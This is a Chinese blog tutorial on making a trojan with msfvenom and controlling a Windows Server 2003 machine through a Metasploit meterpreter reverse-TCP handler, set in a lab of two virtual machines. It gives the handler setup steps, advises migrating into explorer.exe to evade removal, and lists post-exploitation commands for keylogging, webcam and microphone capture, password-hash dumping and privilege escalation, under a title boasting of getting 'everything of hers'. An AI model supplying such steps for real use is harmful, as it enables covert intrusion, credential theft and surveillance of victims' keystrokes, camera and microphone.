利用msfvenom制作木马程序(你可以得到她的一切)

  实验环境:

虚拟机:kali  (攻击机)           192.168.1.2   

虚拟机:windwos 2003 (靶机)   192.168.1.100

 

1. 制作木马

说明: -p payload(有效载荷)

-e  编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-f exe 生成EXE的格式

 

输入命令之后会在home中生成一个 exe的文件

 

2.

然后在终端输入:msfconsole 

然后 use exploit/multi/handler

然后 set payload windows/meterpreter/reverset_tcp

然后 set LHOST 

然后 set LPORT

在run运行

 

3. 将制作的木马放在 windows server2003 ,运行之后,什么也不显示。但是这个时候你就会发现kali这边就已经上线了。

 

 

 

成功获取最高权限,可以做一切你想做的事。

上线之后,由于你的程序木马单独的存在被攻击电脑中,所以容易被清除,这个时候你需要 注入到被攻击者自带的某个程序中,如桌面程序(explorer.exe) ,利用ps命令 ,找到这个进程并记住这个程序的PID。然后 Migrate (迁移) pid 。

然后就实行以下的一些功能:

run vnc   开启远程桌面

sysinfo  获取电脑信息

reboot  重启电脑

shell 获取shell

shutdown  关闭电脑

enumdesktops      --用户登录数

keyscan_dump   键盘记录-下载

keyscan_start   键盘记录 - 开始

keyscan_stop    键盘记录 - 停止

Uictl       获取键盘鼠标控制权

record_mic    音频录制 

webcam_chat   查看摄像头接口

webcam_list   查看摄像头列表

webcam_stream  摄像头视频获取

Getsystem    获取高权限

Hashdump   下载HASH

 

posted @ 2018-06-14 18:08  阳光不败  阅读(1479)  评论(0编辑  收藏  举报